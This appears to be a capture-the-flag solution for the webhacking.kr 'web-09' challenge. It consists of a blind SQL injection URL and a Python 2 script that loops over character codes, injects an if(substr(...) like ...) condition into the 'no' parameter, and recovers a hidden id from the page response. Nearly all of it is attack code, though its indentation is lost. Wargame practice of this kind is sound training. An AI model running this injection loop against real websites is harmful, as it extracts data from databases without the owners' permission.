web6

http://webhacking.kr/challenge/web/web-09/index.php?no=if(substr(id,1,15)like(0x5f5f5f5f5f5f5f5f5f5f5f),3,0)

import requests

f=open("ID_result","wb")

key=""

site="http://webhacking.kr/challenge/web/web-09/index.php"

header={'Cookie':'PHPSESSID='}

for j in range(1,15):

for i in range(30,126):

if chr(i)=='%' or chr(i)=='_' :

 continue

site="http://webhacking.kr/challenge/web/web-09/index.php"

site+="?no=if(substr(id,"+str(j)+",1)like("+str(hex(i))+"),3,0)"

print site

r=requests.put(site,headers=header)

if "Secret" in r.text:

 key+=chr(i)

 print ("======\nNow Key is : %s\n====="%key)

 f.write(key+"\n")

 break;

f.close()